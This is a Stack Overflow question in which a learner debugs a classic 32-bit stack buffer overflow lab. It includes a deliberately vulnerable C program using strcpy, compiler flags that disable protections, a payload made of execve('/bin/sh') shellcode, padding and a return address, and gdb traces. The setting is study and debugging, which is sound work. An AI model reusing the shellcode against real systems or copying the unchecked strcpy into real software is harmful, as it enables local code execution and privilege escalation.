Can't recognize the shellcode after overflowing the return address
I'm sure that I got the return address right. But I got a Segmentation fault after returning from the main function.
I'm using 32-bit Debian GNU/Linux 10 (buster).
The c program is:
// victim.c
#include <string.h>
int main(int argc, char* argv[]) {
char little_array[512];
if(argc > 1)
strcpy(little_array, argv[1]);
return 0;
}
Compile it with:
gcc -fno-stack-protector -z execstack -fno-pie -ggdb -mpreferred-stack-boundary=2 victim.c -o victim
My payload is(512 + 8 bytes):
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf"
Explaination:
shellcode(40 bytes): \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
padding(476 bytes):%0476x
new return address(shellcode address in stack, 4 bytes):
\xc8\xee\xff\xbf
Output of gdb:
zoemurmure@debian:~/shellcoders/chapter2$ gdb victim
GNU gdb (Debian 8.2.1-2) 8.2.1
...
(gdb) set args $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
(gdb) disas main
Dump of assembler code for function main:
0x00001199 <+0>: push %ebp
0x0000119a <+1>: mov %esp,%ebp
0x0000119c <+3>: sub $0x200,%esp
0x000011a2 <+9>: cmpl $0x1,0x8(%ebp)
0x000011a6 <+13>: jle 0x11c0 <main+39>
0x000011a8 <+15>: mov 0xc(%ebp),%eax
0x000011ab <+18>: add $0x4,%eax
0x000011ae <+21>: mov (%eax),%eax
0x000011b0 <+23>: push %eax
0x000011b1 <+24>: lea -0x200(%ebp),%eax
0x000011b7 <+30>: push %eax
0x000011b8 <+31>: call 0x11b9 <main+32>
0x000011bd <+36>: add $0x8,%esp
0x000011c0 <+39>: mov $0x0,%eax
0x000011c5 <+44>: leave
0x000011c6 <+45>: ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x11a2: file victim.c, line 5.
(gdb) run
Starting program: /home/zoemurmure/shellcoders/chapter2/victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0476x\xc8\xee\xff\xbf")
Breakpoint 1, main (argc=2, argv=0xbffff164) at victim.c:5
5 if(argc > 1)
(gdb) n
6 strcpy(little_array, argv[1]);
(gdb) x/20x $esp
0xbfffeec8: 0x00000001 0xb7fffc5c 0x3a5d7643 0x0000a1ab
0xbfffeed8: 0xfffff8a0 0xb7f5c362 0xbfffef01 0x00000000
0xbfffeee8: 0xbfffef28 0x00000007 0xb7fd4128 0x6e43a318
0xbfffeef8: 0xb7fffc50 0xb7fdffad 0x00000000 0x00000000
0xbfffef08: 0xb7fd41a0 0x00000007 0xb7fd41c0 0xb7fffc50
(gdb) x/20x $ebp
0xbffff0c8: 0x00000000 0xb7df8b41 0x00000002 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
8 return 0;
(gdb) x/20x $esp
0xbfffeec8: 0x315e1aeb 0x074688c0 0x5e891e8d 0x0c468908
0xbfffeed8: 0xf3890bb0 0x8d084e8d 0x80cd0c56 0xffffe1e8
0xbfffeee8: 0x69622fff 0x68732f6e 0x30303030 0x30303030
0xbfffeef8: 0x30303030 0x30303030 0x30303030 0x30303030
0xbfffef08: 0x30303030 0x30303030 0x30303030 0x30303030
(gdb) x/20x $ebp
0xbffff0c8: 0x30303030 0xbfffeec8 0x00000000 0xbffff164
0xbffff0d8: 0xbffff170 0xbffff0f4 0x00000001 0x00000000
0xbffff0e8: 0xb7fb8000 0xffffffff 0xb7fff000 0x00000000
0xbffff0f8: 0xb7fb8000 0xb7fb8000 0x00000000 0x7f85b6f2
0xbffff108: 0x3f7210e2 0x00000000 0x00000000 0x00000000
(gdb) n
9 }
(gdb) n
0xbfffeec8 in ?? ()
Notice that:
- The starting address of shellcode in stack is 0xbfffeec8
- After executing
strcpy(little_array, argv[1]);, you can see that the new returning address in the output ofx/20x $ebphas been updated to 0xbfffeec8 - Continue executing, after returning from main function, the output is
0xbfffeec8 in ?? ()
What's the problem? Thx.
asked on Stack Overflow Aug 3, 2019 by 
zoemurmure
zoemurmure0 Answers
Nobody has answered this question yet.
User contributions licensed under CC BY-SA 3.0